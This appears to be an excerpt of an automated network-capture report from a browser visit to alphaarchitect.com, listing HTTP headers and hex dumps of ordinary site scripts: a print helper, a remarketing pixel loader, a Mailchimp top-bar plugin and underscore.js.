                                                                                                                                                                                                                                                                        Data Ascii: a.config.hosts.cdn;if(url.indexOf(cdnPrefix)===0){return url}return cdnPrefix+url};var persistComputedStylesAndRect=(function(){var STYLES_TO_SAVE=['display','visibility'];var RECT_TO_SAVE=['width','height'];var PREFIX='pf';function persistObject(node,ob
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 73 57 69 74 68 28 27 23 27 29 29 7b 72 65 74 75 72 6e 20 73 72 63 7d 65 6c 73 65 20 69 66 28 61 62 73 6f 6c 75 74 65 55 72 6c 52 65 67 65 78 70 2e 74 65 73 74 28 73 72 63 29 29 7b 72 65 74 75 72 6e 20 73 72 63 7d 65 6c 73 65 20 69 66 28 73 72 63 2e 73 74 61 72 74 73 57 69 74 68 28 27 2f 2f 27 29 29 7b 72 65 74 75 72 6e 20 70 66 43 6f 6e 66 69 67 4c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 73 72 63 7d 65 6c 73 65 7b 76 61 72 20 69 6d 61 67 65 44 6f 6d 61 69 6e 3d 70 66 43 6f 6e 66 69 67 4c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 2f 2f 27 2b 70 66 43 6f 6e 66 69 67 4c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 21 73 72 63 2e 73 74 61 72 74 73 57 69 74 68 28 27 2f 27 29 29 7b 73 72 63 3d 27 2f 27 2b 73 72 63 7d 0a 72 65 74 75 72
                                                                                                                                                                                                                                                                        Data Ascii: sWith('#')){return src}else if(absoluteUrlRegexp.test(src)){return src}else if(src.startsWith('//')){return pfConfigLocation.protocol+src}else{var imageDomain=pfConfigLocation.protocol+'//'+pfConfigLocation.host;if(!src.startsWith('/')){src='/'+src}retur
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 6e 20 77 69 6e 64 6f 77 7d 3b 77 69 6e 64 6f 77 4d 61 70 70 69 6e 67 73 2e 63 6f 72 65 3d 63 6f 72 65 57 69 6e 64 6f 77 3b 77 69 6e 64 6f 77 4d 61 70 70 69 6e 67 73 2e 61 6c 67 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 69 6e 64 46 72 61 6d 65 57 69 6e 64 6f 77 28 27 61 6c 67 6f 27 2c 63 6f 72 65 57 69 6e 64 6f 77 28 29 29 7d 3b 62 72 65 61 6b 7d 0a 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 4d 61 70 70 69 6e 67 73 5b 6e 61 6d 65 5d 28 29 7d 0a 72 65 74 75 72 6e 7b 70 6f 73 74 4d 65 73 73 61 67 65 3a 66 75 6e 63 74 69 6f 6e 28 64 65 73 74 69 6e 61 74 69 6f 6e 2c 74 79 70 65 2c 70 61 79 6c 6f 61 64 2c 6f 6e 45 72 72 6f 72 29 7b 76 61 72 20 64 65 73 74 69 6e 61 74 69 6f 6e 57 69 6e 64 6f 77 3d 66 69 6e 64 44 65 73 74 69 6e 61 74 69 6f 6e 57
                                                                                                                                                                                                                                                                        Data Ascii: n window};windowMappings.core=coreWindow;windowMappings.algo=function(){return findFrameWindow('algo',coreWindow())};break}return windowMappings[name]()}return{postMessage:function(destination,type,payload,onError){var destinationWindow=findDestinationW
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 2e 63 61 6c 6c 28 63 6f 6e 73 6f 6c 65 5b 66 75 6e 63 74 69 6f 6e 4e 61 6d 65 5d 2c 63 6f 6e 73 6f 6c 65 29 7d 0a 72 65 74 75 72 6e 20 72 65 73 75 6c 74 7d 29 28 29 3b 76 61 72 20 70 66 52 65 64 69 72 65 63 74 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 70 66 48 6f 73 74 2c 75 73 65 72 53 65 74 74 69 6e 67 73 2c 75 72 6c 29 7b 76 61 72 20 63 6f 6d 70 6f 6e 65 6e 74 73 3d 5b 27 73 6f 75 72 63 65 3d 63 73 27 2c 27 75 72 6c 3d 27 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 72 6c 29 5d 3b 66 6f 72 28 76 61 72 20 63 6f 6e 66 69 67 20 69 6e 20 75 73 65 72 53 65 74 74 69 6e 67 73 29 7b 76 61 72 20 73 65 74 74 69 6e 67 3d 75 73 65 72 53 65 74 74 69 6e 67 73
                                                                                                                                                                                                                                                                        Data Ascii: .prototype.bind.call(console[functionName],console)}return result})();var pfRedirect=(function(){return function(pfHost,userSettings,url){var components=['source=cs','url='+encodeURIComponent(url)];for(var config in userSettings){var setting=userSettings
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 79 70 65 3a 27 73 65 6c 65 63 74 6f 72 27 2c 76 61 6c 75 65 3a 76 61 6c 75 65 7d 7d 7d 7d 7d 0a 72 65 74 75 72 6e 20 72 65 73 75 6c 74 7d 3b 72 65 74 75 72 6e 7b 73 65 6c 65 63 74 6f 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 65 73 75 6c 74 3d 7b 7d 3b 76 61 72 20 6f 70 74 69 6f 6e 73 3d 70 72 69 6e 74 66 72 69 65 6e 64 6c 79 4f 70 74 69 6f 6e 73 28 29 3b 69 66 28 21 6f 70 74 69 6f 6e 73 29 7b 72 65 74 75 72 6e 20 72 65 73 75 6c 74 7d 0a 76 61 72 20 70 72 69 6e 74 66 72 69 65 6e 64 6c 79 4f 70 74 69 6f 6e 73 56 61 6c 75 65 3d 6f 70 74 69 6f 6e 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 73 65 6c 65 63 74 6f 72 73 27 29 7c 7c 6f 70 74 69 6f 6e 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 63 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                        Data Ascii: ype:'selector',value:value}}}}}return result};return{selectors:function(){var result={};var options=printfriendlyOptions();if(!options){return result}var printfriendlyOptionsValue=options.getAttribute('data-selectors')||options.getAttribute('data-conten
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 70 61 72 73 65 64 41 74 74 72 69 62 75 74 65 52 65 73 75 6c 74 2e 63 75 73 74 6f 6d 43 53 53 55 52 4c 29 7b 72 65 73 75 6c 74 2e 63 75 73 74 6f 6d 43 53 53 55 52 4c 3d 70 61 72 73 65 64 41 74 74 72 69 62 75 74 65 52 65 73 75 6c 74 2e 63 75 73 74 6f 6d 43 53 53 55 52 4c 2e 76 61 6c 75 65 7d 0a 69 66 28 70 61 72 73 65 64 41 74 74 72 69 62 75 74 65 52 65 73 75 6c 74 2e 64 69 73 61 62 6c 65 50 44 46 29 7b 72 65 73 75 6c 74 2e 64 69 73 61 62 6c 65 50 44 46 3d 70 61 72 73 65 64 41 74 74 72 69 62 75 74 65 52 65 73 75 6c 74 2e 64 69 73 61 62 6c 65 50 44 46 2e 76 61 6c 75 65 7d 0a 69 66 28 70 61 72 73 65 64 41 74 74 72 69 62 75 74 65 52 65 73 75 6c 74 2e 64 69 73 61 62 6c 65 50 72 69 6e 74 29 7b 72 65 73 75 6c 74 2e 64 69 73 61 62 6c 65 50 72 69 6e 74 3d 70 61 72
                                                                                                                                                                                                                                                                        Data Ascii: parsedAttributeResult.customCSSURL){result.customCSSURL=parsedAttributeResult.customCSSURL.value}if(parsedAttributeResult.disablePDF){result.disablePDF=parsedAttributeResult.disablePDF.value}if(parsedAttributeResult.disablePrint){result.disablePrint=par


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        38192.168.2.449792104.26.3.1224435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC548OUTGET /px/smart/?c=2645100a8c95db0 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: a.remarketstats.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC875INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        X-Frontend: cc-nginx-5967c9b8fb-jjsfq:cc-nginx-5967c9b8fb-jjsfq
                                                                                                                                                                                                                                                                        X-Requestid: 4dd0f15b-d0eb-4abb-ba78-726525c2cc19
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ASInMtYmCHnrDOZVo3VD4%2BRqUNi%2BoWcNpYcnPhOunm%2FsytLwbVlVVWj%2B2k6NKVgjKQkcL%2B3W0oY9olVSj4jMOIJ46DfjpSYUdoM9JAwFhaXoXT%2FMKqiJ042QoTFUw6wLb2j1Uus%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9d5084a42fc-EWR
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1759&rtt_var=774&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1126&delivery_rate=1660034&cwnd=187&unsent_bytes=0&cid=d04e8aea1c76d1c2&ts=580&x=0"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC494INData Raw: 32 65 36 0d 0a 28 66 75 6e 63 74 69 6f 6e 20 28 77 2c 20 64 29 20 7b 0a 20 20 76 61 72 20 64 79 6e 61 6d 69 63 50 69 78 65 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 76 61 72 20 70 69 78 65 6c 55 52 4c 20 3d 20 22 68 74 74 70 73 3a 2f 2f 61 2e 72 65 6d 61 72 6b 65 74 73 74 61 74 73 2e 63 6f 6d 2f 70 78 2f 73 6d 61 72 74 2f 3f 63 3d 32 36 34 35 31 30 30 61 38 63 39 35 64 62 30 26 73 65 67 3d 22 3b 0a 20 20 20 20 76 61 72 20 75 72 6c 50 61 74 68 20 3d 20 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 75 62 73 74 72 28 31 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 2b 24 2f 2c 20 27 27 29 3b 0a 20 20 20 20 69 66 20 28 75 72 6c 50 61 74 68 20 3d 3d 3d 20 22 22 29 20 7b 20 75 72 6c 50 61 74 68 20 3d 20 22 68 6f 6d 65 22 3b 20 7d
                                                                                                                                                                                                                                                                        Data Ascii: 2e6(function (w, d) { var dynamicPixel = function() { var pixelURL = "https://a.remarketstats.com/px/smart/?c=2645100a8c95db0&seg="; var urlPath = w.location.pathname.substr(1).replace(/\/+$/, ''); if (urlPath === "") { urlPath = "home"; }
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC255INData Raw: 20 20 20 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 0a 20 20 7d 3b 0a 0a 20 20 76 61 72 20 62 6f 64 79 20 3d 20 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 62 6f 64 79 27 29 5b 30 5d 3b 0a 20 20 69 66 20 28 62 6f 64 79 29 20 7b 0a 20 20 20 20 64 79 6e 61 6d 69 63 50 69 78 65 6c 28 29 3b 0a 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 64 79 6e 61 6d 69 63 50 69 78 65 6c 28 29 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d 29 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 29 3b 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: d.getElementsByTagName('script')[0].parentNode.appendChild(script); }; var body = d.getElementsByTagName('body')[0]; if (body) { dynamicPixel(); } else { w.onload = function () { dynamicPixel(); } }})(window, document);
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        39192.168.2.449796141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC814OUTGET /wp-content/cache/min/1/wp-content/plugins/mailchimp-top-bar/assets/script.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1343"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9ddec284368-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC877INData Raw: 31 33 34 33 0d 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 2c 6e 29 7b 76 61 72 20 69 3d 6e 3f 22 3b 6d 61 78 2d 61 67 65 3d 22 2b 32 34 2a 6e 2a 36 30 2a 36 30 3a 22 22 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 29 2b 69 2b 22 3b 70 61 74 68 3d 2f 3b 53 61 6d 65 53 69 74 65 3d 6c 61 78 22 7d 63 6f 6e 73 74 20 65 3d 7b 65 78 69 73 74 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 52 65 67 45 78 70 28 74 2b 22 3d 22 29 2e 74 65 73 74 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 29 7d 2c 63 72 65 61 74 65 3a 74 2c 65 72 61 73
                                                                                                                                                                                                                                                                        Data Ascii: 1343(()=>{"use strict";function t(t,e,n){var i=n?";max-age="+24*n*60*60:"";document.cookie=encodeURIComponent(t)+"="+encodeURIComponent(e)+i+";path=/;SameSite=lax"}const e={exists:function(t){return new RegExp(t+"=").test(document.cookie)},create:t,eras
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 3d 77 69 6e 64 6f 77 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 74 69 63 6b 2e 62 69 6e 64 28 74 68 69 73 29 2c 35 30 30 29 7d 65 6c 73 65 20 74 68 69 73 2e 66 6f 72 6d 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 74 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6e 28 74 68 69 73 2e 62 75 74 74 6f 6e 29 2c 65 3d 74 68 69 73 2e 63 68 61 72 3b 69 28 74 68 69 73 2e 62 75 74 74 6f 6e 2c 74 2e 6c 65 6e 67 74 68 3e 3d 35 3f 65 3a 74 2b 22 20 22 2b 65 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 62 75 74 74 6f 6e 29 7b 74 68 69 73 2e 62 75 74 74 6f 6e 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 74 68 69 73 2e 6f
                                                                                                                                                                                                                                                                        Data Ascii: =window.setInterval(this.tick.bind(this),500)}else this.form.style.opacity="0.5"},o.prototype.tick=function(){var t=n(this.button),e=this.char;i(this.button,t.length>=5?e:t+" "+e)},o.prototype.stop=function(){if(this.button){this.button.style.width=this.o
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 74 79 6c 65 2e 6c 69 6e 65 48 65 69 67 68 74 3d 63 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2b 22 70 78 22 29 2c 63 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 22 2c 63 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 6d 3f 74 3a 30 2c 63 2e 73 74 79 6c 65 2e 70 61 64 64 69 6e 67 54 6f 70 3d 6d 3f 6e 3a 30 2c 63 2e 73 74 79 6c 65 2e 70 61 64 64 69 6e 67 42 6f 74 74 6f 6d 3d 6d 3f 6e 3a 30 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 29 7b 74 2e 74 61 72 67 65 74 2e 73 74 79 6c 65 2e 74 72 61 6e 73 69 74 69 6f 6e 3d 22 22 2c 74 2e 74 61 72 67 65 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 76 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 74 2c 65 29 7b 74 2e 73 74 79 6c 65 2e 74 72 61 6e 73 69 74
                                                                                                                                                                                                                                                                        Data Ascii: tyle.lineHeight=c.clientHeight+"px"),c.style.visibility="",c.style.height=m?t:0,c.style.paddingTop=m?n:0,c.style.paddingBottom=m?n:0}function v(t){t.target.style.transition="",t.target.removeEventListener("transitionend",v)}function T(t,e){t.style.transit
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1324INData Raw: 73 6f 6c 65 2e 6c 6f 67 28 27 4d 61 69 6c 43 68 69 6d 70 20 54 6f 70 20 42 61 72 3a 20 66 61 69 6c 65 64 20 74 6f 20 70 61 72 73 65 20 41 4a 41 58 20 72 65 73 70 6f 6e 73 65 2e 5c 6e 5c 6e 45 72 72 6f 72 3a 20 22 27 2b 74 2b 27 22 27 29 7d 69 66 28 62 2e 73 75 63 63 65 73 73 3d 21 21 74 2e 73 75 63 63 65 73 73 2c 62 2e 73 75 62 6d 69 74 74 65 64 3d 21 30 2c 74 2e 73 75 63 63 65 73 73 26 26 74 2e 72 65 64 69 72 65 63 74 5f 75 72 6c 29 72 65 74 75 72 6e 20 76 6f 69 64 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 74 2e 72 65 64 69 72 65 63 74 5f 75 72 6c 29 3b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 68 26 26 68 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 68 29 2c 28 68 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61
                                                                                                                                                                                                                                                                        Data Ascii: sole.log('MailChimp Top Bar: failed to parse AJAX response.\n\nError: "'+t+'"')}if(b.success=!!t.success,b.submitted=!0,t.success&&t.redirect_url)return void(window.location.href=t.redirect_url);!function(t){h&&h.parentNode.removeChild(h),(h=document.crea
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        40192.168.2.449794141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC766OUTGET /wp-includes/js/underscore.min.js?ver=1.13.7 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 00:24:52 GMT
                                                                                                                                                                                                                                                                        ETag: W/"67354354-49be"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9ddea551865-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC877INData Raw: 34 39 62 65 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 76 61 72 20 72 2c 65 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 75 6e 64 65 72 73 63 6f 72 65 22 2c 74 29 3a 28 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 6e 7c 7c 73 65 6c 66 2c 72 3d 6e 2e 5f
                                                                                                                                                                                                                                                                        Data Ascii: 49be/*! This file is auto-generated */!function(n,t){var r,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define("underscore",t):(n="undefined"!=typeof globalThis?globalThis:n||self,r=n._
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 61 62 6c 65 22 2c 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 22 74 6f 4c 6f 63 61 6c 65 53 74 72 69 6e 67 22 5d 2c 47 3d 4d 61 74 68 2e 70 6f 77 28 32 2c 35 33 29 2d 31 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 75 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 6e 75 6c 6c 3d 3d 6f 3f 75 2e 6c 65 6e 67 74 68 2d 31 3a 2b 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 4d 61 74 68 2e 6d 61 78 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 6f 2c 30 29 2c 74 3d 41 72 72 61 79 28 6e 29 2c 72 3d 30 3b 72 3c 6e 3b 72 2b 2b 29 74 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 2b 6f 5d 3b 73 77 69 74 63 68 28 6f 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 75 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                        Data Ascii: able","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=Math.max(arguments.length-o,0),t=Array(n),r=0;r<n;r++)t[r]=arguments[r+o];switch(o){case 0:return u.call(this,t);case 1:return
